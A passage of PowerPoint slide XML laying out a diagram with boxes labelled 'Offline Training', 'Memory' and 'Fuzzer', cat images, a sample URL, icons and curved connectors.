                <a:t>Offline Training</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2400" dirty="0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3739CEC-C7BF-9156-B163-81BDAAD4980C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="313307" y="79348"/>
            <a:ext cx="2996405" cy="3274769"/>
            <a:chOff x="313307" y="79348"/>
            <a:chExt cx="2996405" cy="3274769"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rechteck: abgerundete Ecken 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9182DAF-F8C9-9418-A630-1F15D666C8AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="794756" y="400199"/>
              <a:ext cx="2514956" cy="295391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Grafik 56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E19C6912-411A-2F1F-8326-BD8FA455A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13307" y="79348"/>
              <a:ext cx="702077" cy="702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3D78D6-E58F-D323-25C9-B2B80614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9DC7F1-A511-A670-6859-CED7AFB0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588818-D49A-EED8-E6A7-A7ECDC742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20</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/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E8289DE-E064-CEB4-1C79-85E81964B657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6743899" y="152911"/>
            <a:ext cx="4338378" cy="2753210"/>
            <a:chOff x="6743899" y="152911"/>
            <a:chExt cx="4338378" cy="275321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6E92ECA-B8A1-9184-203F-8AE352D8588C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7033245" y="261963"/>
              <a:ext cx="4049032" cy="264415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2E415664-E2CA-715C-5A9D-6287013F7EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7105666" y="429428"/>
              <a:ext cx="3846201" cy="414000"/>
              <a:chOff x="7034135" y="823072"/>
              <a:chExt cx="3415485" cy="344196"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rechteck: abgerundete Ecken 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A81951-992C-30D4-B4A4-8F4F0E0EFB20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7034135" y="823073"/>
                <a:ext cx="2244090" cy="34419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/>
                  <a:t>http://CuteCats.com/</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Interaktive Schaltfläche: Zur Startseite wechseln 1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F7BFBF6C-19C6-5327-B452-95BAE2F9A3F4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9342536" y="823073"/>
                <a:ext cx="379329" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonHome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nteraktive Schaltfläche: Dokument 2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3D2BE3F4-8E56-94B7-AD17-39EFFCE5EEFC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9773464" y="823073"/>
                <a:ext cx="315047" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonDocument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nteraktive Schaltfläche: Zurück oder Vorherige(r) 2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D8CD0C91-3F32-42A5-749F-9505D4DD7CDC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10140110" y="823072"/>
                <a:ext cx="309510" cy="337053"/>
              </a:xfrm>
              <a:prstGeom prst="actionButtonBackPrevious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C65D68D5-79A1-CDDF-C58C-6E2525EBA7F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6743899" y="152911"/>
              <a:ext cx="842006" cy="438681"/>
              <a:chOff x="5839315" y="461904"/>
              <a:chExt cx="842006" cy="438681"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Google Shape;316;p34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB12F7D7-CC15-A7E6-0F1E-FFA935CB3153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839315" y="462154"/>
                <a:ext cx="421002" cy="4384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Google Shape;317;p34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8D56D0-C378-6906-2C40-278106DDF54E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260318" y="461904"/>
                <a:ext cx="421003" cy="4132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23" name="Connector: Curved 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAC2ADA-F003-764C-33A9-9A7A952CADF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221768" y="2037095"/>
            <a:ext cx="4093801" cy="3444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5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Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0FF1296-6355-2830-C286-1649AC474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569" y="1449463"/>
            <a:ext cx="3456226" cy="1244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2" name="Connector: Curved 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4612D575-53D5-9369-813E-23053EA536D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="3"/>
            <a:endCxn id="47" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327694" y="1197627"/>
            <a:ext cx="4588972" cy="41440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7" name="Grafik 46" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F033CBF-699C-A322-0B6B-E3CB356CCF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16666" y="1020090"/>
            <a:ext cx="2079065" cy="1183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EFFF26C0-54D4-21D4-8129-885932C68DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2781217" y="4477838"/>
            <a:ext cx="2295181" cy="1751500"/>
            <a:chOff x="-4155331" y="3932384"/>
            <a:chExt cx="2295181" cy="1751500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26D4974-F367-A9B9-3667-331C34756081}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-4155331" y="3969910"/>
              <a:ext cx="1877281" cy="92333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0" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D578D66-948C-513A-CFEA-37455D5B427C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3786079" y="3932384"/>
              <a:ext cx="1256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Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46E2EFE-0DE9-628B-0DF8-EE0431880D2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-4096245" y="4410929"/>
              <a:ext cx="1877281" cy="79969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2" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAB2E6B-9158-EA37-0EDF-539B62960FCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3957345" y="4650350"/>
              <a:ext cx="1877281" cy="79969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3" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77574CD-AD3D-A48D-B2C6-2D4B516DD075}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3737431" y="4884188"/>
              <a:ext cx="1877281" cy="799696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55" name="Grafik 54" descr="Brain in head">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C8C8BD1-3B25-0217-45D6-E484F9AE01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7735" y="4730748"/>
            <a:ext cx="1240004" cy="1240004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A403C16F-67CA-DECC-818D-694EB4F914CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="208974" y="4450373"/>
            <a:ext cx="2193106" cy="855824"/>
            <a:chOff x="9338986" y="5252514"/>
            <a:chExt cx="2301258" cy="997493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Rectangle: Rounded Corners 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805A41A6-2B89-FC90-8E15-97A7E7E99B36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9338986" y="5615062"/>
              <a:ext cx="2055922" cy="634945"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5086B5"/>
            </a:solidFill>
            <a:ln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Fuzzer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="64" name="Graphic 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C1DD26-BAB5-5A79-64C8-BC03BBB61FFF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06201" y="5252514"/>
              <a:ext cx="634043" cy="634945"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Grafik 73" descr="Schriftrolle mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0520D4E0-8123-3F5A-34FF-D7275E5EC15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7036" y="2620387"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Verbinder: gekrümmt 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68791568-CA8E-583A-9587-438A9102C508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="77" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264854" y="2784848"/>
            <a:ext cx="1016631" cy="264417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Verbinder: gekrümmt 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CFC787-1E62-21CD-0750-3E772CEE1EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="74" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191436" y="3077587"/>
            <a:ext cx="2394469" cy="1653161"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48071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55B92C09-960F-9F8F-A49F-236389E145D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445625" y="1719463"/>
            <a:ext cx="2776143" cy="635263"/>
            <a:chOff x="148990" y="1042511"/>
            <a:chExt cx="2776143" cy="635263"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Gruppieren 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF8B9AC-1ED8-8260-AFB0-DCAF41E51D3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="841887" y="1042511"/>
              <a:ext cx="2083246" cy="635263"/>
              <a:chOff x="9257603" y="606346"/>
              <a:chExt cx="2506222" cy="582394"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rechteck: abgerundete Ecken 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4EC0C0-0C60-5339-9C99-819B0CB2B279}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9257603" y="606346"/>
                <a:ext cx="2506222" cy="582394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feld 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860EA199-9C1E-F7F2-0F4B-CD9F98EA55A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9754638" y="685920"/>
                <a:ext cx="1512154" cy="423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10800206-390F-180D-0623-21081388A881}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="148990" y="1143908"/>
              <a:ext cx="953102" cy="510261"/>
              <a:chOff x="3065317" y="4864318"/>
              <a:chExt cx="1124845" cy="611691"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rechteck 89">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8BA04-52B7-3DAD-376F-2ED5FBC48323}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4879148"/>
                <a:ext cx="1124845" cy="5968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1" name="Grafik 90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F5484409-2D34-2960-A59A-DC172DFF3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351028" y="4864318"/>
                <a:ext cx="605407" cy="590272"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp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633B4AA8-DA61-6C8A-DB92-23252A0EDC8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445625" y="873041"/>
            <a:ext cx="2882069" cy="714825"/>
            <a:chOff x="48501" y="1751112"/>
            <a:chExt cx="2882069" cy="714825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{601035DC-F8A7-DFFF-4711-19011C4598F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="847324" y="1758066"/>
              <a:ext cx="2083246" cy="635263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1" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAA097FF-A249-7A96-3B58-D93784BBF321}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1290954" y="1844864"/>
              <a:ext cx="1256947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Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Grafik 92" descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF8BE37-C93C-AE27-10D3-ACD89BBAA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8501" y="1751112"/>
              <a:ext cx="1071715" cy="714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6DCDF7A-ED86-8C5A-9E9D-CB8713A2B548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8651006" y="4765801"/>
            <a:ext cx="3065026" cy="1181952"/>
            <a:chOff x="8651006" y="5275093"/>
            <a:chExt cx="3065026" cy="1181952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Pfeil: nach rechts 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75768042-FC5F-C833-AC37-7F51DBD71A7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8651006" y="5722236"/>
              <a:ext cx="1860002" cy="425532"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C9492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8" name="Grafik 117" descr="Martinshorn mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D92F6EC-39B4-1FD0-BCB0-3C06241B0C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534080" y="5275093"/>
              <a:ext cx="1181952" cy="1181952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C3569D4-0F23-6FDD-3FA9-23C2B585DA38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10534605" y="3014922"/>
            <a:ext cx="1382645" cy="1147004"/>
            <a:chOff x="10534605" y="3014922"/>
            <a:chExt cx="1382645" cy="1147004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="116" name="Pfeil: nach rechts 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04DE9392-6378-7C2D-6FD9-F45C128A63F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="10127853" y="3421674"/>
              <a:ext cx="1147003" cy="333499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0" name="Grafik 119" descr="Häkchen mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2524764-93DA-2D81-98B2-6D364FE1FF5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868105" y="3112781"/>
              <a:ext cx="1049145" cy="1049145"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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AF59084-DA85-F40E-8122-900A17C10D28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445625" y="2467216"/>
            <a:ext cx="2819229" cy="654195"/>
            <a:chOff x="111341" y="2536000"/>
            <a:chExt cx="2819229" cy="654195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E0EA78-1157-11C7-0251-89F811B9E99B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="847324" y="2536000"/>
              <a:ext cx="2083246" cy="635263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8" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BCFE79-4A82-CAE8-A839-2E23E29F1285}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1281561" y="2591461"/>
              <a:ext cx="1256947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Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="126" name="Gruppieren 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B5DF88-C8BC-9916-BE7D-51026176D09F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="111341" y="2689171"/>
              <a:ext cx="953102" cy="501024"/>
              <a:chOff x="3065317" y="4676091"/>
              <a:chExt cx="1124845" cy="600618"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst/>
            <a:scene3d>
              <a:camera prst="perspectiveHeroicExtremeRightFacing"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Rechteck 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707405BC-AFE8-FBE7-93A4-BDAD40956D2C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3065317" y="4679848"/>
                <a:ext cx="1124845" cy="596861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:sp3d contourW="12700">
                <a:contourClr>
                  <a:srgbClr val="7C60C6"/>
                </a:contourClr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8" name="Grafik 127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3674C7DF-F592-E3E9-FE7B-AA30B5B44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351028" y="4676091"/>
                <a:ext cx="605408" cy="590272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14C36486-CF68-49CA-92B1-C62C6AECA24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3264023" y="5050944"/>
            <a:ext cx="1338275" cy="1310997"/>
            <a:chOff x="-3782934" y="4795684"/>
            <a:chExt cx="1960747" cy="2113544"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="Grafik 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
